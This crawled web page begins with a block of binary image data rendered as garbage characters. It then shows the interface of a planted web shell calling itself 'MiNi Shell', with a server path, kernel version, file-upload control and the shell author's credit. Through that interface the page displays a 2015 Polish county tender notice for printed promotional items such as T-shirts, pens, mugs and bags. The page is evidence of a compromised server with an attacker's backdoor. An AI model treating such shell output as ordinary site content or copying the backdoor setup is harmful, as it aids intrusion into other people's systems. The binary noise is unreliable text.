JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150504/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150504/62701-N-2015.html

<p class="kh_header"><b>Nowy Sącz: ZP.272.11.2015 Zamówienie na wykonanie i dostawę materiałów promocyjnych z nadrukiem logo/herbu powiatu nowosądeckiego</b><br>
<b>Numer ogłoszenia: 62701 - 2015; data zamieszczenia: 04.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nowosądecki, Zarząd Powiatu Nowosądeckiego , ul. Jagiellońska 33, 33-300 Nowy Sącz, woj. małopolskie, tel. 18 4141600, faks 18 4141700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nowosadecki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP.272.11.2015 Zamówienie na wykonanie i dostawę materiałów promocyjnych z nadrukiem logo/herbu powiatu nowosądeckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostawa materiałów promocyjnych z nadrukiem logo/herbu powiatu nowosądeckiego. 
W dniu podpisania umowy z wybranym Wykonawcą Zamawiający dostarczy mu projekty graficzne nadruków w plikach CDR lub PDF.


1)	koszulka bawełniana czarna i biała wg wizualizacji i parametrów:
- model JHK TSRA 150 lub równoważny: koszulka wykonana z bawełny o gramaturze bawełny 150 g, w kolorach czarnym i białym, podwójny szew przy rękawach, na ramionach i wzdłuż brzegu dolnego, brak bocznych szwów, ściągacz przy szyi wzmocniony lycrą, 
- ilość: 2000 szt., w tym: 
1000 szt. czarnych w rozmiarach: S - 300 szt., M - 300 szt., L - 250 szt., XL - 100 szt., XXL - 50 szt.,
1000 szt. białych w rozmiarach: S - 300 szt., M - 300 szt., L - 250 szt., XL - 100 szt., XXL - 50 szt.,
- nadruk w dwóch miejscach: z przodu koszulki 3 kolory, z tyłu koszulki 1 kolor - zgodnie                     z proporcjami na wizualizacji,
- koszulka pakowana indywidualnie w zaklejany woreczek foliowy PP przezroczysty
 
2)	długopis plastikowy z końcówką przystosowaną do ekranów dotykowych wg wizualizacji i parametrów:
- długopis model AP7010-03 lub równoważny: długopis plastikowy, korpus w kolorze niebieskim/czerwonym/zielonym/czarnym z metalowymi elementami wykończeniowymi              w kolorze srebrnym, mechanizm obrotowy włączający wkład w kolorze niebieskim                    lub czarnym,
- ilość: 2000 szt. (mix kolorów), w tym: niebieski - 500 szt., czerwony - 500 szt., zielony - 500 szt., czarny - 500 szt.,
- znakowanie: nadruk 1 kolor (srebrny) pod klipem centralnie umieszczony - zgodnie                   z proporcjami na wizualizacji,
- długopisy pakowane po 100 szt. w woreczek foliowy PP przezroczysty

3)	brelok metalowy wg wizualizacji i parametrów:
- błyszczący brelok metalowy w kształcie jabłka z ogonkiem i listkiem, wymiary 43x37x5 mm (? 1%) lub brelok metalowy z obracającym się dyskiem i błyszczącymi pierścieniami,
- ilość: 1000 szt.,
- znakowanie: laser - zgodnie z proporcjami na wizualizacji,
- brelok pakowany indywidualnie w pudełeczko kartonowe
      
4)	metalowe przybory do pisania - pióro kulkowe + długopis - wg wizualizacji i parametrów:
- model Vesa z kolekcji Millenium lub równoważny: korpus metalowy błyszczący, elementy wykończeniowe/skuwka metalowe - chrom błyszczący srebrny, długość 14-15 cm, 
- ilość: 500 kpl., w tym: grafitowy 200 kpl., niebieski 250 kpl., czerwony 50 kpl., 
- znakowanie: laser na obu przyborach do pisania - zgodnie z proporcjami na wizualizacji,
- przybory do pisania umieszczone w etui Z-1 lub równoważnym w kolorze srebrnym                      lub czarnym

5)	pendrive o pojemności 8GB wg wizualizacji i parametrów:
- pendrive model Twister Original lub w równoważny: w obudowie metalowo-gumowej (korpus wykonany z kolorowej gumy, część obrotowa - metalowa),
- pojemność 8 GB, 
- ilość: 500 szt., w tym: w kolorze jasnozielonym 100 szt., niebieskim 100 szt., czerwonym - 100 szt., czarnym - 100 szt., białym - 100 szt.,
- znakowanie laserowe na obrotowej metalowej części pendriva - zgodnie z proporcjami                 na wizualizacji,
- pendrive pakowany indywidualnie w pudełeczko papierowe z przezroczystym okienkiem umożliwiającym rozpoznanie koloru pendriva bez jego rozpakowywania (model 44002                   lub równoważny)

6)	kubek ceramiczny biały z kolorowym środkiem wg wizualizacji i parametrów:
- kubek model Modern 098 lub w równoważny: kubek ceramiczny, na zewnątrz biały matowy, wewnątrz błyszczący kolorowy, ucho duże okrągłe, pojemność 350 ml (? 5 ml), wysokość: 87 mm (? 2 mm), średnica: 90 mm (? 5 mm),
- ilość: 504 szt., w tym: w kolorze jasnozielonym 154 szt., niebieskim 100 szt., czerwonym - 150 szt., czarnym - 100 szt., 
- znakowanie: nadruk bezpośredni 3 kolory na całej powierzchni kubka - zgodnie z proporcjami na wizualizacji,
- kubek pakowany indywidualnie w pudełko kartonowe z oznaczeniem koloru kubka znajdującego się w pudełku, co umożliwi rozpoznanie koloru kubka bez jego rozpakowywania

7)	wizytownik z ekoskóry i metalu z zapięciem na magnes - wg wizualizacji i parametrów:
- wizytownik model NEOAS L17519-01 lub równoważny: pojemnik na wizytówki metalowy, klapka zamykająca wykonana z ekoskóry w kolorach białym/czarnym/granatowym/czerwonym/jasnozielonym, wymiary: szerokość 63 mm (? 3 mm), długość 93 mm (? 3 mm), wysokość 14 mm (? 2 mm),
- ilość: 500 szt., w tym: białe - 100 szt., czarne - 150 szt., granatowe - 150 szt., czerwone -           50 szt., jasnozielone - 50 szt.,
- znakowanie: tłoczenie (25 x 60 mm) na części wykonanej z ekoskóry - zgodnie z wizualizacją,
- wizytownik pakowany w indywidualne w pudełeczko kartonowe z oznaczeniem koloru wizytownika znajdującego się w pudełku, co umożliwi rozpoznanie koloru wizytownika bez jego rozpakowywania

8)	brelok odblaskowy miękki - wg wizualizacji i parametrów:
- brelok odblaskowy w kolorach żółtym/białym/czerwonym, średnica 40-50 mm, z metalowym karabińczykiem lub łańcuszkiem kulkowym, 
- ilość: 2000 szt., w tym: białe - 500 szt., czerwone - 500 szt., żółte - 1000 szt., 
- znakowanie: nadruk 1 kolor (czarny 100%, 60%, 30%) na jednej stronie (1+0) - zgodnie                         z wizualizacją,
- brelok pakowany po 100 szt. w woreczek foliowy PP przezroczysty

9)	torba papierowa mała niebieska wg wizualizacji i parametrów:
- rozmiar: szer. 24 cm (?1 cm), głęb. 10 cm (?1 cm), wys. 24 cm (?1 cm), z zachowaniem formy kwadratowej,
- papier biały powlekany min. 190 g,
- uszlachetnienie: folia matowa + lakier UV (napisy na niebieskiej części torby),
- druk 4+0 (zgodnie z dostarczoną wizualizacją),
- uchwyty: krótkie 2 x 40 cm ze sznurka PP z zabezpieczonymi końcówkami, kolor granatowy (dopasowany kolorystycznie do nadruku na torbie - zatwierdzony przez Wykonawcę                w trakcie realizacji zamówienia), sznurek przewlekany przez otwory, grubość sznurka               5 mm,
- dno torby: usztywnione tekturą ok. 450 g,
- góra torby: usztywniona tekturą ok. 800 g,
- ilość: 2000 szt.

10)	torba papierowa duża niebieska wg wizualizacji i parametrów:
- rozmiar: szer. 28 cm (?1 cm), głęb. 12 cm (?1 cm), wys. 34 cm (?1 cm),
- papier biały powlekany min. 190 g,
- uszlachetnienie: folia matowa + lakier UV (napisy na niebieskiej części torby),
- druk 4+0 (zgodnie z dostarczoną wizualizacją),
- uchwyty: krótkie 2 x 40 cm ze sznurka PP z zabezpieczonymi końcówkami, kolor granatowy (dopasowany kolorystycznie do nadruku na torbie - zatwierdzony przez Wykonawcę                 w trakcie realizacji zamówienia), sznurek przewlekany przez otwory, grubość sznurka                5 mm,
- dno torby: usztywnione tekturą ok. 450 g,
- góra torby: usztywniona tekturą ok. 800 g,
- ilość: 2000 szt.

11)	torba papierowa duża zielona wg wizualizacji i parametrów:
- rozmiar: szer. 34 cm (?1 cm), głęb. 12 cm (?1 cm), wys. 34 cm (?1 cm), z zachowaniem formy kwadratowej,
- papier biały powlekany min. 190 g,
- uszlachetnienie: folia matowa + lakier UV (napisy na białej części torby),
- druk 4+0 (zgodnie z dostarczoną wizualizacją),
- uchwyty: krótkie 2 x 40 cm ze sznurka PP z zabezpieczonymi końcówkami, kolor jasnozielony (dopasowany kolorystycznie do nadruku na torbie - zatwierdzony przez Wykonawcę w trakcie realizacji zamówienia), sznurek przewlekany przez otwory, grubość sznurka 5 mm,
- dno torby: usztywnione tekturą ok. 450 g,
- góra torby: usztywniona tekturą ok. 800 g,
- ilość: 1500 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 22.46.20.00-6, 79.34.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga
wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji).
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na
podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji).
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na
podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji).
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na
podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji).
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na
podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1
ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji).
Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na
podstawie informacji zawartych w dostarczonych dokumentach i oświadczeniach wymaganych w
specyfikacji</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty powinien być dołączony dokument określający zasady reprezentacji oraz osoby uprawnione do
reprezentacji Wykonawcy, a jeżeli Wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo,
określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.
Pełnomocnictwo do podpisania oferty winno być dołączone do oferty (oryginał lub kopia potwierdzona za
zgodność z oryginałem przez notariusza), o ile prawo do podpisania oferty nie wynika z innych
dokumentów dołączonych do oferty. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych
innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w
takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami w trakcie
realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Termin realizacji zamówienia - 15</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat.nowy-sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w
Nowym Sączu, Zespół ds. Zamówień Publicznych, pok. 320 ul. Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2015 godzina 10:15, miejsce: Starostwo Powiatowe w Nowym Sączu Kancelaria Administracyjna, pok. 113, ul.
Jagiellońska 33, 33-300 Nowy Sącz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje możliwość wykluczenia z postępowania o udzielenie zamówienia
Wykonawcy, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie
naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub
rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie
wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o
udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i
kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w
przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał
się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com